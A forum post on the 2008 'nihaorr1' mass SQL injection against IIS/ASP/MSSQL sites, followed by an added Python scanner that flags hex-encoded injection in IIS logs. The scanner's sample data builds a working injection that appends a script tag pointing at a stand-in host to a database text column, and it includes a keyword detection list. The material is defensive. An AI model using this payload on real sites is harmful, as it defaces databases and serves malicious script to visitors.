Spotted a note about a forum being hacked from Granada in the travel section, but it looks like it's hitting rather widely and injecting itself into ASP sites with databases quite a lot.
There's a breakdown on this site (page 2+ is most useful):
Anyone know about nihaorr1
...but essentially if you're running IIS and ASP with MSSQL then this could be quite serious if you don't spot it coming in. According to Slashdot and F-Secure, there could be 500,000 servers affected, although I didn't think 500K people were daft enough to run Windows based servers.
There's a lot of confusing information on this currently as to exactly what it does, but in essence it seems that an encrypted query string or form input hits the site and tries to run an SQL-type injection attack against the database. Due to the encryption and problems with ASP and MSSQL this isn't too easy to spot, so it effectively finds all the TEXT fields and adds some J/script code to those, presumably on the assumption that some of them will be output to the screen.
The output is a series of J/script-based iFrames which install a trojan on the user's computer, which then tries to attack web sites with this virus. A bit like when that virus hit lots of PHPBB boards. Unfortunately, like that one, it runs and potentially hits very hard, but doesn't seem to use Google to do the attacks. Presumably it only runs when it finds an ASP site to send its injection to by GET or POST.
It also seems it uses known problems with MSSQL and ASP to get in and do its work, so doesn't currently hit LAMP systems. I don't understand all the technical stuff about exactly how it gets in, but from what I can see it gets past quite a few security features, so even having permissions on the tables might not always protect.
A few more bits on it:
Microsoft Security Advisory (951306): Vulnerability in Windows Could Allow Elevation of Privilege
Slashdot | 500 Thousand MS Web Servers Hacked
Final aim of this seems to be something to do with the Olympics in China, but it could easily be altered to destroy things with a DROP or TERMINATE, or of course just fill the tables with all kinds of illegal stuff. Just depends who gets hold of it.
Trev - running everything on LAMP
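Added example, not part of Trev's post or the linked write-ups: a small Python scanner for IIS W3C logs that looks for the kind of encoded injection the post describes. It assumes the "encrypted" query string is T-SQL whose real body is hidden inside a hex literal in a CAST(0x... AS VARCHAR) and then EXEC'd (the widely reported form of this campaign, but an assumption here), and that the request is logged in the cs-uri-query field. The log lines, the hostname example.invalid and the table name Articles are all constructed for the demo, not real traffic.

```python
"""Scan IIS W3C log lines for SQL injection hidden in a hex literal.

Added example, not from the original forum post. Assumes the attacker's
real statement is wrapped as CAST(0x<hex> AS VARCHAR(n)) and EXEC'd, so
a keyword grep on the raw query string would miss most of it. All
sample data below is constructed for the demo.
"""
import re
import urllib.parse

# Keywords that have no business in an ordinary page parameter.
SUSPICIOUS = re.compile(
    r"\b(DECLARE|CAST|EXEC|UPDATE|CURSOR|sysobjects|syscolumns)\b", re.I)
# A hex literal of at least 16 hex digits: long enough to hide a statement.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{16,})")


def decode_hex_literals(text):
    """Return the decoded contents of every long hex literal in `text`."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:  # odd length cannot be a whole byte string
            continue
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def analyse_query(cs_uri_query):
    """Return the sorted SQL keywords found in a query string, including
    those that only appear once any hex literal has been decoded."""
    text = urllib.parse.unquote_plus(cs_uri_query)
    found = {k.upper() for k in SUSPICIOUS.findall(text)}
    for inner in decode_hex_literals(text):
        found.update(k.upper() for k in SUSPICIOUS.findall(inner))
    return sorted(found)


def scan_iis_log(lines):
    """Parse W3C extended log lines; return (cs-uri-stem, keywords) for each
    request whose query string looks like the injection."""
    fields = None
    hits = []
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # field names follow the directive
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or truncated record, skip it
        rec = dict(zip(fields, values))
        keywords = analyse_query(rec.get("cs-uri-query", "-"))
        if keywords:
            hits.append((rec["cs-uri-stem"], keywords))
    return hits


# --- constructed sample data -------------------------------------------
# The statement hidden inside the hex literal: append a script tag to a
# text column, which is what the post describes. Table/host are made up.
INNER_SQL = ("UPDATE Articles SET Body=RTRIM(CONVERT(VARCHAR(8000),Body))"
             "+'<script src=http://example.invalid/a.js></script>'")
HEX_PAYLOAD = INNER_SQL.encode("ascii").hex()
INJECTION = ("1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + HEX_PAYLOAD
             + " AS VARCHAR(4000));EXEC(@S);--")

SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query "
    "s-port cs-username c-ip sc-status",
    "2008-04-25 10:01:02 10.0.0.5 GET /news.asp id=42 80 - 192.0.2.10 200",
    "2008-04-25 10:01:03 10.0.0.5 GET /news.asp "
    + urllib.parse.quote("id=" + INJECTION, safe="=")
    + " 80 - 198.51.100.7 200",
    "2008-04-25 10:01:04 10.0.0.5 GET /about.asp - 80 - 192.0.2.11 200",
]

if __name__ == "__main__":
    for stem, keywords in scan_iis_log(SAMPLE_LOG):
        print(stem, keywords)
```

Run it against a real log by feeding `scan_iis_log(open(path))` instead of the sample list. It is a triage check, not a filter: a query parameter that legitimately contains a word like "update" will be flagged, so tune the keyword list to the site. Finding the requests tells you which pages are building SQL from raw parameters; the fix on those pages is to stop concatenating input into the query at all (typed parameters), since any encoding trick sails past a keyword blacklist.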
